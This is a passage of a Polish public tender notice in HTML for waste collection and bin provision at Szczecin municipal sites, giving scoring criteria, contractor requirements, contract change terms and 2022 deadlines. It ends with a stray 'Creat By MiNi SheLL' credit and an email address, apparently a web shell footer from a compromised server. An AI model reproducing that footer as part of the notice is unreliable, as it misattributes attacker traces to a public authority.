Wykonawca wykona przedmiot zamówienia z najwyższą starannością wymaganą <br/>od podmiotu profesjonalnie świadczącego tego typu usługi, na zasadzie zapewnienia najwyższej jakości prac, zgodnie z przepisami prawa powszechnie obowiązującego, a także SWZ i z ofertą, które będą stanowiły integralną część umowy.<br/>5. Wykonawca zapewni, we flocie pojazdów używanych przy wykonywaniu przedmiotu zamówienia, co najmniej 10 % udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym w rozumieniu ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty najkorzystniejszej, spośród ofert nie podlegających odrzuceniu, zostanie dokonany według następujących kryteriów oceny ofert: <br/><br/>1)	cena – 60 %<br/> Wykonawca w tym kryterium może otrzymać maksymalnie 60 pkt.<br/>	Sposób przyznania punktów w kryterium „cena” (C): <br/><br/> C = najniższa cena / cena w ofercie ocenianej x 100 pkt x 60 %<br/><br/>2) wysokość kary umownej za każdy dzień zwłoki w wykonaniu usługi – 20 %<br/> Wykonawca w tym kryterium może otrzymać maksymalnie 20 pkt.<br/>Sposób przyznania punktów w kryterium „wysokość kary umownej” (K):<br/><br/>Punkty zostaną przyznane w zależności od wysokości zaproponowanej przez Wykonawcę kary umownej za zwłokę w wykonaniu przedmiotu umowy w terminie, <br/>o którym mowa w umowie (każdorazowe niewykonanie usługi w ciągu 24 godzin <br/>od zgłoszenia przez Zamawiającego), w następujący sposób: <br/> a) jeżeli Wykonawca zaproponuje karę umowną w wysokości 100,00 zł za każdy dzień<br/> zwłoki – 20 pkt<br/>b) jeżeli Wykonawca zaproponuje karę umowną w wysokości 90,00 zł za każdy dzień<br/> zwłoki – 10 pkt<br/> c) jeżeli Wykonawca zaproponuje karę umowną w wysokości 80,00 zł za każdy dzień<br/> zwłoki – 0 pkt<br/><br/>Jeżeli Wykonawca zaproponuje karę umowną w wysokości mniejszej niż 80,00 zł, wówczas oferta zostanie odrzucona.<br/>Jeżeli Wykonawca zaproponuje karę umowną w wysokości większej niż 100,00 zł, wówczas do oceny ofert zostanie przyjęta maksymalna wysokość kary umownej, czyli 100,00 zł. <br/><br/>2)	poziom emisji spalin – 20 % <br/> Wykonawca w tym kryterium może otrzymać maksymalnie 20 pkt.<br/>	Sposób przyznania punktów w kryterium „poziom emisji spalin” (E): <br/><br/>Punkty zostaną przyznane w zależności od zaproponowanego przez Wykonawcę samochodu, w następujący sposób: <br/>a)	jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin Euro 4 – 0 pkt<br/>b)	jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin Euro 5 – 10 pkt<br/>c)	jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin Euro 6 – 20 pkt<br/><br/>Jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin mniejszej niż Euro 4, wówczas oferta zostanie odrzucona.<br/><br/>S = C + K+ E<br/><br/>2. Największa ilość punktów (S) wyliczonych w powyższy sposób decyduje o uznaniu oferty za najkorzystniejszą.<br/>3. Ocena ofert zostanie dokonana odrębnie dla każdej części przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Poziom emisji spalin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. część III obejmuje:<br/> a) odbiór i transport odpadów do regionalnej instalacji przetwarzania odpadów<br/> komunalnych właściwej dla Gminy Miasto Szczecin,<br/> b)	wyposażenie obiektów w pojemniki odpowiadające polskiej normie <br/> PN-EN 840 wg poniższej specyfikacji:<br/> - kąpielisko miejskie Dąbie: <br/> w okresie od dnia 15 stycznia 2023 r. do dnia 31 grudnia 2023 r.: 1 pojemnik <br/> o poj. 1100 l na szkło i 1 pojemnik o poj. 1100 l na tworzywa sztuczne, <br/> - kąpielisko miejskie Głębokie:<br/> w okresie od dnia 15 stycznia 2023 r. do dnia 31 grudnia 2023 r.: 1 pojemnik <br/> o poj. 1100 l na szkło i 1 pojemnik o poj. 1100 l na tworzywa sztuczne, <br/> - kąpielisko miejskie Dziewoklicz:<br/> w okresie od dnia 15 stycznia 2023 r. do dnia 31 grudnia 2023 r.: 1 pojemnik <br/> o poj. 1100 l na szkło i 1 pojemnik o poj. 1100 l na tworzywa sztuczne, <br/> - siedziba ZUK ul. Ku Słońcu 125A (prawe i lewe skrzydło): <br/> w okresie od dnia zawarcia umowy do dnia 31 grudnia 2023 r.: 2 pojemniki <br/> każdy o poj. 2,5 m3 na tworzywa sztuczne,<br/> - Schronisko dla Bezdomnych Zwierząt przy ul. Południowej (w budowie):<br/> w okresie od dnia zawarcia umowy do dnia 31 grudnia 2023 r.: 2 pojemniki <br/> każdy o poj. 2,5 m3 na tworzywa sztuczne,<br/> c) częstotliwość odbioru odpadów – w ciągu 24 godzin od zgłoszenia przez<br/> Zamawiającego (z wyłączeniem dni ustawowo wolnych od pracy), <br/> d)	przewidywana szacunkowa roczna ilość odpadów: 110 m3.<br/>2.Pojemniki przeznaczone do selektywnej zbiórki odpadów komunalnych powinny być jednoznacznie oznakowane piktogramami właściwymi dla danej frakcji selektywnie zbieranych odpadów komunalnych.<br/>3. Zamawiający dopuszcza możliwość telefonicznej formy powiadamiania Wykonawcy o konieczności dokonania odbioru odpadów ze wskazanego obiektu Zakładu Usług Komunalnych, potwierdzonego następnie drogą elektroniczną.<br/> 4.	Wykonawca wykona przedmiot zamówienia z najwyższą starannością wymaganą od podmiotu profesjonalnie świadczącego tego typu usługi, na zasadzie zapewnienia najwyższej jakości prac, zgodnie z przepisami prawa powszechnie obowiązującego, a także SWZ i z ofertą, które będą stanowiły integralną część umowy.<br/>5. Wykonawca zapewni, we flocie pojazdów używanych przy wykonywaniu przedmiotu zamówienia, co najmniej 10 % udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym w rozumieniu ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	cena – 60 %<br/> Wykonawca w tym kryterium może otrzymać maksymalnie 60 pkt.<br/>	Sposób przyznania punktów w kryterium „cena” (C): <br/><br/> C = najniższa cena / cena w ofercie ocenianej x 100 pkt x 60 %<br/><br/>2) wysokość kary umownej za każdy dzień zwłoki w wykonaniu usługi – 20 %<br/> Wykonawca w tym kryterium może otrzymać maksymalnie 20 pkt.<br/>Sposób przyznania punktów w kryterium „wysokość kary umownej” (K):<br/><br/>Punkty zostaną przyznane w zależności od wysokości zaproponowanej przez Wykonawcę kary umownej za zwłokę w wykonaniu przedmiotu umowy w terminie, <br/>o którym mowa w umowie (każdorazowe niewykonanie usługi w ciągu 24 godzin <br/>od zgłoszenia przez Zamawiającego), w następujący sposób: <br/> a) jeżeli Wykonawca zaproponuje karę umowną w wysokości 40,00 zł za każdy dzień<br/> zwłoki – 20 pkt<br/>b) jeżeli Wykonawca zaproponuje karę umowną w wysokości 30,00 zł za każdy dzień<br/> zwłoki – 10 pkt<br/> c) jeżeli Wykonawca zaproponuje karę umowną w wysokości 20,00 zł za każdy dzień<br/> zwłoki – 0 pkt<br/><br/>Jeżeli Wykonawca zaproponuje karę umowną w wysokości mniejszej niż 20,00 zł, wówczas oferta zostanie odrzucona.<br/>Jeżeli Wykonawca zaproponuje karę umowną w wysokości większej niż 40,00 zł, wówczas do oceny ofert zostanie przyjęta maksymalna wysokość kary umownej, czyli 40,00 zł. <br/><br/>3) poziom emisji spalin – 20 % <br/> Wykonawca w tym kryterium może otrzymać maksymalnie 20 pkt.<br/><br/>	Sposób przyznania punktów w kryterium „poziom emisji spalin” (E): <br/>Punkty zostaną przyznane w zależności od zaproponowanego przez Wykonawcę samochodu, w następujący sposób: <br/>a)	jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin Euro 4 – 0 pkt<br/>b)	jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin Euro 5 – 10 pkt<br/>c)	jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin Euro 6 – 20 pkt<br/><br/>Jeżeli Wykonawca zaproponuje samochód o poziomie emisji spalin mniejszej niż Euro 4, wówczas oferta zostanie odrzucona.<br/><br/>S = C + K+ E<br/><br/>2. Największa ilość punktów (S) wyliczonych w powyższy sposób decyduje o uznaniu oferty za najkorzystniejszą.<br/>3. Ocena ofert zostanie dokonana odrębnie dla każdej części przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Poziom emisji spalin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - minimalny poziom zdolności to:<br/>1)	uprawnienia do prowadzenia działalności regulowanej w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2022 r. poz. 1297 ze zmianami). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust 1 ustawy w zakresie podstawy wykluczenia z postępowania z art. 108 ust. 1 pkt 1, 2, 3, 4 i 6 ustawy i z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835),<br/>	2)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową<br/> albo<br/> oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wpis do ewidencji działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonej przez Prezydenta Miasta Szczecin, zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2022 r. poz. 1297 ze zmianami),</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga składania przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia na zasadach określonych w art. 57 – 60 ustawy.<br/>2.	Wspólnicy spółki cywilnej są wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia.<br/>3.	Przed zawarciem umowy w sprawie zamówienia publicznego, wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić Zamawiającemu umowę kopię umowy regulującej współpracę tych wykonawców, zawierającej, co najmniej:<br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>2)	określenie zakresu działania poszczególnych stron umowy,<br/>3)	czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia,<br/>4)	wskazanie wykonawcy upoważnionego do wystawienia faktury. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy:<br/>1)	zmiana postanowień niniejszej umowy może nastąpić na podstawie i pod rygorami art. 455 ustawy,<br/>2)	Zamawiający przewiduje możliwość zmiany umowy w przypadku:<br/>a)	zwiększenia lub zmniejszenia ilości odpadów, powodującego zwiększenie lub zmniejszenie wynagrodzenia, w oparciu o ceny jednostkowe zawarte w umowie,<br/>b)	zmiany stawki podatku od towarów i usług, wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, powodującej zwiększenie lub zmniejszenie kwoty wynagrodzenia Wykonawcy; zasady wprowadzania zmian:<br/>A. Wykonawca najpóźniej w terminie 30 dni od dnia wejścia w życie przepisów wprowadzających zmiany, o których mowa wyżej, może wystąpić <br/>do Zamawiającego z pisemnym wnioskiem o dokonanie zmiany umowy <br/>w zakresie wysokości wynagrodzenia wraz z jej uzasadnieniem oraz dokumentami niezbędnymi do oceny przez Zamawiającego, czy zmiany mają<br/> wpływ na koszty wykonania umowy przez Wykonawcę oraz w jakim stopniu zmiany tych kosztów uzasadniają zmianę wysokości wynagrodzenia Wykonawcy określonego w umowie, a w szczególności:<br/>- szczegółową kalkulację proponowanej zmienionej wysokości wynagrodzenia Wykonawcy oraz wykazanie adekwatności propozycji <br/>do zmiany wysokości kosztów wykonania umowy przez Wykonawcę,<br/>-	przyjęte przez Wykonawcę zasady kalkulacji wysokości kosztów wykonania umowy oraz założenia co do wysokości dotychczasowych oraz przyszłych kosztów wykonania umowy, wraz z dokumentami potwierdzającymi prawidłowość przyjętych założeń - takimi jak <br/>np. umowy o pracę lub dokumenty potwierdzające zgłoszenie pracowników <br/>do ubezpieczeń,<br/> B.	Zamawiający najpóźniej w terminie 30 dni od dnia wejścia w życie przepisów wprowadzających zmiany, o których mowa wyżej, może przekazać Wykonawcy pisemny wniosek o dokonanie zmiany umowy, w przypadku wydania przepisów wprowadzających zmiany, o których mowa w wyżej. Wniosek powinien zawierać co najmniej propozycję zmiany umowy w zakresie wysokości wynagrodzenia oraz powołanie zmian przepisów, przy czym przed przekazaniem ww. wniosku, Zamawiający może zwrócić się <br/>do Wykonawcy o udzielenie informacji lub przekazanie wyjaśnień lub dokumentów (oryginałów do wglądu lub kopii potwierdzonych za zgodność <br/>z oryginałem) niezbędnych do oceny przez Zamawiającego, czy zmiany, <br/>o których mowa wyżej, mają wpływ na koszty wykonania umowy przez Wykonawcę oraz w jakim stopniu zmiany tych kosztów uzasadniają zmianę wysokości wynagrodzenia,<br/>c)	innej okoliczności prawnej, ekonomicznej lub technicznej skutkującej niemożliwością wykonania lub nienależytym wykonaniem umowy zgodnie <br/>z SWZ,<br/>3)	Zamawiający i Wykonawca dopuszczają możliwość zmian redakcyjnych umowy oraz zmian będących następstwem zmian danych Stron ujawnionych w rejestrach publicznych.<br/>4)	Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy, <br/>przez przedstawienie drugiej Stronie propozycji zmiany w formie pisemnej, które powinny zawierać:<br/>a) rodzaj i zakres zmian,<br/>b) warunki wprowadzenia zmian,<br/>c) ustalenie, że zmiany nie modyfikują ogólnego charakteru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-09 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Udostępnienie zasobów<br/>Zamawiający nie stawia warunków udziału w postępowaniu dotyczących zdolności zawodowych lub technicznych lub sytuacji finansowej lub ekonomicznej, co oznacza, że nie będą miały zastosowania art. 118 -123 ustawy.<br/><br/>II. Sposób i termin składania ofert<br/>Ofertę (według wzoru stanowiącego załącznik nr 1 do SWZ) wraz z wymaganymi oświadczeniami i dokumentami, tj.:<br/>1)	oświadczeniem o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postepowaniu (według wzoru stanowiącego załącznik nr 2 do SWZ),<br/>2) pełnomocnictwami,<br/>3) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia: oświadczeniem wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w art. 117 ust. 4 ustawy (według wzoru stanowiącego załącznik nr 3 do SWZ) i oświadczeniami o niepodleganiu wykluczeniu i spełnianiu warunków udziału <br/>w postepowaniu dot. każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy złożyć na Platformie – zgodnie z zapisami SWZ, w terminie do dnia 09.12.2022 r., do godz. 9.00.<br/><br/>III. Informacje o formalnościach, które muszą zostać dopełnione po wyborze oferty w celu zawarcia umowy w sprawie zamówienia publicznego<br/>1.	Wykonawca ma obowiązek zawrzeć umowę w sprawie zamówienia publicznego na warunkach określonych w projektowanych postanowieniach umowy stanowiących załącznik nr 4 do SWZ. <br/>2.	Do dnia zawarcia umowy Wykonawca przedłoży Zamawiającemu:<br/> 1) dot. części I – III - udokumentowanie poziomu emisji spalin samochodów wskazanych do realizacji zadania,<br/> 2)	dot. części I: oświadczenie o przyjęciu odpadów przez regionalną instalację do przetwarzania odpadów komunalnych właściwą dla Gminy Miasto Szczecin.<br/>3.	Zamawiający poinformuje Wykonawcę o miejscu i terminie zawarcia umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com